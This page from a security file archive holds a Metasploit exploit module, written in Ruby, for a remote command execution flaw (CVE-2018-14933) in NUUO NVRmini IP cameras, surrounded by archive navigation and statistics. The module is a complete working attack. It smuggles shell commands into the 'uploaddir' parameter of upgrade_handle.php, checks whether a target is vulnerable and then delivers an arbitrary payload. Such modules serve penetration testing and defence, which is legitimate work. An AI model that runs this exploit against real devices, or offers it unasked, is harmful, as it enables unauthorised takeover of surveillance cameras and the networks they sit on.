NUUO NVRmini upgrade_handle.php Remote Command Execution

NUUO NVRmini upgrade_handle.php Remote Command Execution: Posted Feb 7, 2019; Authored by Berk Dusunur, numan turle | Site metasploit.com; This Metasploit module exploits a vulnerability in the web application of NUUO NVRmini IP camera, which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.; tags | exploit, web, php; advisories | CVE-2018-14933; SHA-256 | 0e6d6f16b31358d1595593354838281181d64f454a338a4ce6a5d4c2cc1f34b3; Download | Favorite | View

NUUO NVRmini upgrade_handle.php Remote Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
      'Description' => %q{
        This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
        which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
      },
      'License' => MSF_LICENSE,
      'Author'  =>
        [
          'Berk Dusunur', # @berkdusunur
          'numan turle'   # @numanturle
        ],
      'References' =>
        [
          ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
          ['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
          ['CVE', '2018-14933'],
          ['EDB', '45070']
        ],
      'Privileged'   => false,
      'Payload'      =>
        {
          'DisableNops' => true
        },
      'Platform'       => %w{ unix win linux },
      'Arch'           => ARCH_CMD,
      'Targets'        => [ ['NUUO NVRmini', { }], ],
      'DisclosureDate' => 'Aug 04 2018',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
      'vars_get' =>
        {
          'cmd' => 'writeuploaddir',
          'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
        }}
      )

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /upload_tmp_dir/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      =>  uri,
      'vars_get' =>
        {
          'cmd' => 'writeuploaddir',
          'uploaddir' => "';"+cmd+";'"
        }}
      )

    unless res
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end

    res
  end

  def exploit
    http_send_command(payload.encoded)
  end
end

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

NUUO NVRmini upgrade_handle.php Remote Command Execution

NUUO NVRmini upgrade_handle.php Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

NUUO NVRmini upgrade_handle.php Remote Command Execution

Share This

NUUO NVRmini upgrade_handle.php Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems